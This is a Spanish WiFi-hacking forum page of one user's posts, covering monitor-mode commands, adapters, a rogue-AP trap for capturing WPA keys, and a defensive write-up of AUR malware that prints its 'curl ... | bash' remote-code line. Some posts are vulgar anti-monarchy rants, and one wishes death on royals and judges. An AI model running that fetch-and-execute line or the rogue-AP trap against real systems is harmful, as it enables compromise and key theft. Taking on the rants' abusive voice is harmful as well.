El libre pensamiento para un internet libre

No estas registrado.  

#1 Re: Las herramientas para attaque WPS » Wireless Air Cut, auditoria del protocolo wps en Windows » Ayer 22:23:01

Antes de preguntar hay que leer un poco, se ha hablado del tema de los kernel panic hace 5 mensajes atrás... tongue
Sino, no es que me importe mucho pero windows 10 es "2 veces" mas seguro que windows 7 Windows 10 vs Windows 7: Microsoft's newer OS is almost 'twice as secure'...
Así que puedes abrazar  "el futuro" con alegría (el tuyo, no el mio, porque para seguridad y hacking la solucion es una distribución GNU-Linux wink )

#2 Re: Cañas y tapas » Los Borbones son unos ladrones y me cago en todos los monar-cacas » Ayer 22:03:39

El problema es que faltan cosas, hay un nivel de desigualdad de mucho cojones aquí.
Y lo que mas me toca la fibra es cuando afecta a los niños

España es el tercer país en pobreza infantil en la UE
Con un 40% de niños con "pobreza anclada", en la lista solo le superan Rumanía y Grecia.

España es el tercer país en pobreza infantil en la UE
Es de el pais, no es que estén de extrema izquierda..
7 datos que explican la gravedad de la pobreza infantil en España
Yo puedo pasar hambre, me la suda, puedo vivir en un piso sin agua o luz, me la suda, puedo buscar comida en la basura, me la suda, no tengo vergüenza y si hay hambre te olvidas de la vergüenza; puedo quedarme con un diente podrido y comer cinco ibuprofenos al día para aguantar el dolor hasta que tenga bastante para ir al dentista (y no quiero que me arranquen el diente, la única cosa gratis)   Pero nuestros hijos... No lo admito, no lo aguanto.
Mientras que estos cabrones se gastan en un segundo el equivalente de mi sueldo para cualquier capricho, para una prenda.
Que puto pais es un sitio donde un rey tiene una colección de coches de lujos que no cabe en un campo de futbol mientras hay ninos que no tienen gafas porque  sus padres no las pueden pagar etc...
España trata peor a sus ninos que Letonia o lituania... Has ido a letonia?
Porque para hacerlo peor que Letonia hay que querer... O sea, no digo que los letones son mala gente, no me mal interpretes,  pero hay muchísimo menos dinero que en espana...  No pueden ofrecer a su rey coches de colección (no tienen) pero tratan mejor a sus ninos...
Es hora de despertar y ir a tomar el dinero donde esta para repartirlo. Y abolir de paso a esta maldita monarquía que no sirve absolutamente de nada. 
Para que los ninos de este país tengan una vida decente y algo de esperanza para su futuro.
Porque lo que pasa en la décima potencia económica mundial (aka espanistan) es simplemente intolerable y criminal.

#3 Re: Cañas y tapas » Los Borbones son unos ladrones y me cago en todos los monar-cacas » Ayer 13:53:29

Somos por lo menos tres pero la cosa no le ha ido muy bien a la tercera persona  tongue

Detienen a un hombre en Tenerife por un presunto delito de injurias contra la Corona tras escribir en Facebook 'los borbones a los tiburones'

El detenido es un activista prosaharahiu vinculado con otros movimientos sociales. Está acusado de un presunto delito de odio e injurias por comentarios realizados en su perfil de Facebook, donde llegó a escribir cosas como 'me cago en la monarquía, en el Rey y en todo sus cuerpos represivos".

     antenna3

No pensaba que España era una ditablenda. 
Alucino con este tema... No sabia que la cosa iba tan lejos.
No estamos en la edad media, juan carlos y todo la familia real son unos parásitos inútiles que no tienen ninguna legitimidad. "Derecho divino"... Hay que ser mongolo para creer y aceptar esta  mierda.
  La familia real es chusma que merece estar detrás de las rejas para el resto de su vida.
Si tu robas 80 millones de €uros como el ha hecho te aseguro que no sales vivo de la chabola.
  Es muy grave lo que está pasando, las leyes que protegen a la familia real son anti democráticas, dignas de Corea del norte o de Arabia Saudia.
Qué rabia me da todo esto...  No hay justicia.
hashtag#mecagoenelrey tongue

edit:
No había visto esto:

2. Se impondrá la pena de multa de seis a veinticuatro meses al que utilizare la imagen del Rey o de cualquiera de sus ascendientes o descendientes, o de la Reina consorte o del consorte de la Reina, o del Regente o de algún miembro de la Regencia, o del Príncipe heredero, de cualquier forma que pueda dañar el prestigio de la Corona.

Patético y absolutamente ILEGAL.
Pues si [email protected], al ser miembro de la Unión Europa, España debe cumplir con la ley europea. El derecho europeo es supranacional y es "superior" al derecho nacional.
Y existe algo llamado derecho de expresión y los caricaturistas pueden hacer caricaturas en Europa. Del rey, del presidente, del director, de dios, de lo que tu quieras.   
Pueden multar-me por esto? 

Juan_Carlos_I_2009_3.jpg

O cortarme la mano? Ya que estamos... big_smile
Y me hace ilusión poner aquí esta cobertura de Charlie hebdo en 1975 que invita los "gilipollas, corruptos, escoria facistas etc..." a ir a madrid para celebrar el sacro de juan carlos primero.

Une-charlie-hebdo-27-nov-1975-juan-carlos-espagne.jpeg

Con esto supongo que es pena de muerte si un periodista de charlie pone un pie en la jonqera lol

#4 Cañas y tapas » Los Borbones son unos ladrones y me cago en todos los monar-cacas » 19-07-2018 14:50:27

kcdtv
Respuestas: 5
Afilen las guillotinas: Es hora de ajustar cuentas con la casa real

giphy.gif

A pesar de estar de vacaciones, alejado de todo y sin Internet (excepto cuando voy al bar del pueblo, o sea cada día big_smile ), las cosas llegan.
Las ultimas revelaciones de la tía que se follaba a Juan Carlos primero ponen en evidencia la punta del icebreg
Primero es para partirse de risa (por no llorar) pensar en todos los subnormales extremistas del opus dei venerando a un rey que se folla todo lo que pasa cerca y que "peca por lujuria".
El nivel de hipocresía de Juan Carlos I es comparable al nivel de estupidez de sus seguidores.
80 millones de dinero publico robado por la corona con la historia del ave... Cualquier ciudadano lambda estaría en cárcel de por vida por robar tanto dinero publico.
Por tener retraso en las facturas puedes acabar con tus hijos en la calle mientras que estos cerdos duermen tranquilos en sus mansiones. 
Y este pedazo de mierda nunca verá la caja de un juez, si la ve sera desde arriba porque le estará chupando la polla.   
Al parecer en este país no se puede decir nada sobre la corona. Incluso te pueden mandar a la cárcel durante anos.

¿No se puede? 

ME CAGO EN LOS PUTOS BORBONES Y LOS MAMONES DE JUECES QUE LES DEFIENDEN
TODOS SE MERECEN MORIR AHOGADOS EN SU PROPIA MIERDA

  ¡A okupar el palacio real y las cienes y miles de propriedades que robaron estos chorizos!
De hecho no hay delito de usurpación porque son los Borbones quienes ocupan España desde siglos.
Sin hablar de los millones y millones de indios de América exterminados por la corona para robar su oro y plata
  Estos rateros mentirosos son cómplices de genocidio!
Señores jueces, si ustedes me buscan, es fácil: Estoy tomando una caña en el bar del pueblo y soy la persona que está cagando en una foto de Juan Carlos 1. wink

#5 Re: Preguntas generales y comparativas » Adaptadores WiFi USB compatibles modo monitor y inyección (hack wifi) » 18-07-2018 11:04:02

Yes, are you 100% sure?

Nope. Por esto he precisado "a mi conocimiento"... Nunca he visto o he podido probar los modelos que presentaste. He tenido un par de dispositivos con este chip y ninguno tenia antenas externas. Estos tienen buena pinta smile

#6 Re: Asesoramiento sistemas Linux » configuración de sensores de temperatura y voltajes, y mod de torre. » 17-07-2018 23:32:10

Para subir imágenes lo mejor es usar tu espacio de alojamiento personal en el foro.
https y se quedaran aquí for ever and ever.

subidaswifilibre.jpg

#7 Re: Preguntas generales y comparativas » Adaptadores WiFi USB compatibles modo monitor y inyección (hack wifi) » 17-07-2018 21:47:22

Todos los chipset ralink USB trabajan con este driver (rt2800usb) que proporciona soporte para modo monitor y inyección. Es el driver que se debe usar. Existen drivers "STA" para este chipset (y los otros) pero no valen para nada... Son francamente malos en modo managed y no son compatibles con el modo monitor.

#9 Re: Asesoramiento sistemas Linux » configuración de sensores de temperatura y voltajes, y mod de torre. » 16-07-2018 14:21:44

primero tengo que comprobar si me sobran conexiones para los ventiladores

Tengo dos enchufes en la placa y he podido poner un tercero ventilador que reciclé de una vieja torre porque está montado así

caja3.jpg

No estará detectado por sensores o la BIOS, no podremos regular su velocidad, solo pasa la corriente.
Luego lo enchufas a una toma de la fuente y puedes enchufar el conjunto para alimentar otro periférico:

caja4.jpg

Me hizo gracia el chisme y me apaña bien la cosa. smile

#11 Re: Alfa Network » Problema con ALFA NETWORK » 14-07-2018 17:40:45

No sé, no uso windows. De todo modo no lo he pensado bien: macgeiger no te sirve. El tube es un dispositivo que conectas por cable rj45, los niveles de señal están gestionados por el tube, no por el cliente de redes del ordenador. Tendrás que hacerlo con lo que te propone la interfaz del tube.

#12 Re: Asesoramiento sistemas Linux » configuración de sensores de temperatura y voltajes, y mod de torre. » 14-07-2018 17:32:41

se ve bastante bien la

Esto se llama un eufemismo. tongue
Parece que usas tu caja para hacer barbacoas. big_smile   

  He añadido de mi lado un ventilador trasero y un ventilador por arriba.
La pasta térmica no estaba en mal estado. 
Al final la temperatura se queda por debajo de 50º y los ventiladores trabajan a menos velocidad.

CPU FAN Speed:     2934 RPM  (min =  800 RPM, max = 7200 RPM)
CHASSIS FAN Speed: 2576 RPM  (min =  800 RPM, max = 7200 RPM)
CPU Temperature:    +47.0°C  (high = +60.0°C, crit = +95.0°C)
MB Temperature:     +42.0°C  (high = +45.0°C, crit = +95.0°C)

No me quedan espacios para colocar mas ventiladores así que este será el resultado final.

#14 Re: Alfa Network » ¡Notición! ¡Inyección con AWUS036ACH! ¡La revolución está en marcha! » 13-07-2018 19:27:17

El driver no es compatible con airmon-ng a la hora de activar el modo monitor
Para activar el modo monitor debes hacerlo "the old fashioned way"
Es decir:

sudo ip l s <interfaz> down
sudo iwconfig <interfaz> mode monitor
sudo ip l s <interfaz> up 

Sin olvidar de "matar" antes los procesos conflictivos, lo que puedes esta vez con hacer airmon-ng:

sudo airmon-ng check kill

Tu interfaz no cambiará de nombre: Si es wlan0 se llamará wlan0 (no será wlan0mon) pero estará en modo monitor.

#15 Re: Hacking wireless : los métodos alternativos » "Una historia de Rogue AP": El PDF de koala traducido al español » 13-07-2018 19:19:31

No importa el password que configuras en la red trampa WEP. 
  El cliente cifra los mensajes con su llave.
La que entra el usuario en su gestor de redes cuando se conecta a la red WEP (nuestra) pensando que se conecta a su red (WPA)
Este ataque solo puede funcionar con llaves WPA que tienen un "formato" WEP es decir:

  • 10 caracteres hexadecimales

  • 13 caracteres ascii

  • 26 caracteres hexadecimales

Si la llave no sigue al pie de letra uno de estos tres patrones la trampa no funciona porque el usuario no puede conectarse a la red WEP.

#16 Re: Alfa Network » Problema con ALFA NETWORK » 13-07-2018 15:13:19

¡[email protected] a wifi-libre ed argo! smile
Si tienes a una antena de rejillas es realmente importante cuidar el direccionamiento de la antena. Debes apuntar con precisión.
Si usas linux te aconsejo macgeiger: MacGeiger: Localizador de redes WiFi con advertencias sonoras.
No hace falta mirar la pantalla para ver los niveles de las señales y es de lo más practico cuando tienes una antena fuera y quieres encontrar el "punto G" tongue     
Tu antena tiene 24dBi de ganancia. No veo el interés en cambiarla.
Podrás encontrar unas antenas de rejillas de 26dBi, la diferencia es mínima y el problema será el mismo si no apuntas con precisión el objetivo.
Si compras una antena omnidireccional tendrás una ganancia menor y no te interesa ya que lo que buscas es la velocidad máxima. Buscas tener el nivel de señal el más ato posible.
Yo no veo otra que apuntar bien antes de todo
Y luego, eventualmente, otro chipset... El rt3070 está muy bien pero a lo mejor te convendría más un atheros.
Pero antes de todo apuntar muy bien. Un pequeño movimiento  a la izquiera o a la derecha puede traducirse por varios mbps de diferencia.
¡Hasta luego!

#17 Re: El mercadillo » 1ª Sorteo Del Mercadillo » 13-07-2018 14:31:01

Nunca en mi vida había mirado cada día un página de loto. Entiendo ahora lo de la adicción al juego.  big_smile

#18 Re: El mundo de las distribuciones GNU-Linux » Malware encontrado en repositorios comunitarios AUR para Arch Linux » 12-07-2018 21:45:17

Cualquier cosa... ¡Menos unos repositorios oficiales GNU-Linux! cool
Imposible que pase algo similar por apt (si no añades ppa)  (en debian y derivados) o mediante pacman (en arch linux).
Debería dejarte buen sabor en boca ver que unos repositorios comunitarios abiertos a [email protected] son millones de veces más seguros que cualquier market google, windows o IOS. wink
El paquete malicioso era obsoleto, para una tarea idiota, se ha visto enseguida y estoy seguro que nadie ha sido afectado.
Lo que debería dejar mal sabor de boca es usar códigos cerrados dónde desconocemos del todo el código... La ilusión de seguridad es la peor cosa. Ver y entender es el mejor remedio.

#19 Re: Seguridad y Hacking » Spectre/Meltdown: Intel estaba al tanto y organizó la omertá » 12-07-2018 21:11:47

Hace tiempo que no hablamos de spectre.
Los desarrolladores de distribuciones GNU-Linux nos tenían advertidos: Se ha colmatado lo gordo pero veremos surgir variantes de los atacantes en el futuro .
El sistema operativo solo puede impedir que se exploten las brechas, no puede arreglar el problema a la raíz de una vez por todas.
Esto está entre las manos de Intel y está totalmente sobrepasado por la magnitud del desastre: Todas las CPU que han producido y vendido estos diez últimos años están comprometidas.
  Hubiera de que hundir cualquier empresa pero como Intel está en posición de monopolio en un mercado muy cerrado... Es solo un mal trago a pasar.

El fantasma ha vuelto... big_smile
   Este diez de julio 2018 se ha publicado un "white paper" para presentar a Spectre 1.1 y Spectre 1.2

  Dos vulnerabilidades de "alto riesgo" y la reacción de Intel habla por si sola: Han entegrado 100 000 dolares (el "premio" máximo) a los autores del documento que pasaron por su programa de "bug bounty".

   Los de linux están trabajando sobre un parche para la versión 1.1: [PATCH] perf/core: fix possible spectre-v1 write

#20 El mundo de las distribuciones GNU-Linux » Malware encontrado en repositorios comunitarios AUR para Arch Linux » 12-07-2018 20:22:05

kcdtv
Respuestas: 3
Se ha encontrado un malware en los repositorios AUR de Arch Linux
¿Qué pensar al respecto?

aur_virus_2.jpg

Encontrar un virus en unos repositorios para distribución GNU-Linux es (afortunadamente) extremadamente raro. 
Podemos hablar en este caso de un epifenómeno porque no estamos hablando de los repositorios "oficiales" de Arch Linux
Los repositorios oficiales de Arch Linux, los que están mantenidos por el equipo de desarrollo, son los repositorios "pacman". 
Los repositorios AUR están mantenidos por la comunidad de usuarios de Arch Linux.
Es fundamental recordar esto: Usar otros repositorios que los repositorios de nuestra distribución supondrá siempre un riesgo.   

  Pasa lo mismo en debian (kali y ubuntu etc...) con los repositorios oficiales y los repositorios "ppa" (non oficiales) que podemos añadir para instalar una aplicación fuera de los repositorios de nuestra distribución. 
Debemos hacerlo solo con software de confianza y personalmente prefiero prescindir totalmente de ellos, no añado ppa. .

  El malware en cuestión ha sido introducido el 7 de julio por un tal xeactor
No era un malware dañino en si.
Tiraba de curl para mandar afuera información colectada sobre el ordenador.
  Su CPU , entre otras cosas.
  Era muy probablemente la fase uno del plan de xeactor
  Se ha pillado a este mismo xeactor en el mercado android colocando malwares para minar bitcoins.
  CPU - Bitcoins...  ¡Elemental mi querido Watson!  El muy listo colectaba información para infectar ordenadores con minadores de criptomonedas.   
 
  La pregunta que queda en suspenso es ¿Son seguros estos repositorios AUR?
Cabe decir que son los repositorios non-oficiales más seguros que haya (hablando de todas las distribuciones)
Será el primer caso de malware encontrado y se ha detectado de inmediato.
El paquete infectado se ha quedado tan solo 9 horas.
Lo que ha levantado sospechas es que en la ultima actualización del paquete se ha añadido un linea de código curl (utilidad para descargar o subir datos)
El paquete en cuestión se llama acroread.git y era orfanato, es decir, el paquete se ha marcado como obsoleto por un largo tiempo.
Xeactor ha aprovechado esto para hacerse por pasar por un buen samaritano que quería darle una segunda vida a este paquete.
Podéis ver a continuación la modificación que ha levantado sospechas:

aur_virus_1.jpg

 

curl -s https://ptpb.pw/~x|bash -&

  curl está invocado en modo "silencioso" (opción -s).
Se ejecuta un script en pipe sin saber los comandos empleados (wtf? uno pam ) y todo esto se hace desde/hacía una web externa con un dominio basura (wtf? dos pam )
  Una de las grandes calidades de estos repositorios alternativos es que permiten revisar todos los cambios lo que hace imposible esconder algo mucho tiempo.
  Hay que decir también que no creo que muchos tienen a este paquete viejo y sin interés, creo incluso que no ha recogido... ningunos datos.
Este paquete es para instalar... Adobe PDF reader en Linux (wtf? tres big_smile )
Existen muchas alternativas de código libre  y disponibles desde los repositorios oficiales,
  Es bueno recordar que para nuestra seguridad debemos siempre privilegiar los softwares instalados desde nuestros repositorios oficiales y debemos siempre privilegiar las soluciones de código libre,

  En todos casos este incidente no desacredita a los repositorios AUR ni mucho menos.
Siempre habrá un cretino (hay que ser un idiota para usar el mismo nick para atacar a dos objetivos diferentes tongue)  para intentar aprovecharse del funcionamiento abierto de unos repositorios comunitarios basados en la libre colaboración. 
El malware estaba en un paquete muy viejo, sin mantenimiento desde tiempo, diseñado para una tarea... que no tiene sentido (¿Quien coño usa adobe pdf reaver en linux? big_smile )
La reacción fue inmediata y el malware, es importante repetirlo, se quitó en menos de nueve horas.
Todo esto ilustra más bien la eficiencia y el nivel de seguridad insuperable del funcionamiento en código libre.
   Los repositorios AUR, a pesar de ser abiertos y mantenido por la comunidad, son muchísimo, pero que muchísimo,  más seguros que el mercado android que tiene a toda la maquinaría google detrás.

  Referencias

#21 Re: Hacking wireless : los métodos alternativos » Crack WPA sin fuerza bruta con el nuevo menú "Evil Twin" de airgeddon » 12-07-2018 17:57:36

Debes instalar los drivers... Hay bastante documentación sobre esto en el foro: ¡Notición! ¡Inyección con AWUS036ACH! ¡La revolución está en marcha! 
  La situación ha ido evolucionando y los drivers de ahora son los drivers proporcionados desde el git de aircrack-ng

#22 Re: El mercadillo » 1ª Sorteo Del Mercadillo » 12-07-2018 17:01:10

No lo sé. Cosas del servidor. Puede pasar a veces pero generalmente dura muy poco.
¡Buena suerte a [email protected]! smile

#23 Re: Hacking wireless : los métodos alternativos » Crack WPA sin fuerza bruta con el nuevo menú "Evil Twin" de airgeddon » 11-07-2018 18:40:23

Tu tarjeta con chipset RTL8187l no es compatible con hostapd porque no tiene soporte para modo AP
Estos son los modos soportados ( los puedes ver en la salida de iw wink ) :

 Supported interface modes:
         * IBSS
         * managed
         * monitor

Para poder usar el modo "evil twin" te haría falta una interfaz con estos modos soportados:

	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor

Desgraciadamente no hay solución conocida: Haría falta reescribir los drivers y/o el firmware. hmm
¿No tienes a un portátil con una tarjeta interna? ¿Otra tarjeta wifi USB?

#24 Re: El mercadillo » 1ª Sorteo Del Mercadillo » 10-07-2018 21:55:26

Me alegro de que sigas con el sorteo.
A mi también me gusta así... No tengo ningún problemas en tener una emoción diaria. Es divertido así y de esto se trata también   smile

#25 Re: Asesoramiento sistemas Linux » configuración de sensores de temperatura y voltajes, y mod de torre. » 10-07-2018 16:13:18

Parece que tu ordenador está vomitando los discos duros... big_smile
Los discos puestos así, en suspensión en el aire, sin ninguna protección ni estabilidad... ¡Qué peligro! Me duele verlo.
Cualquier golpe mientras están encendidos y se rompen.
¡Otra caja ya! big_smile

Pie de página

Información del usuario

Ultimo usuario registrado: Visiete
Usuarios registrados conectados: 0
Invitados conectados: 16

Estadisticas de los foros

Número total de usuarios registrados: 1,071
Número total de temas: 1,095
Número total de mensajes: 11,037

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21
Impulsado por FluxBB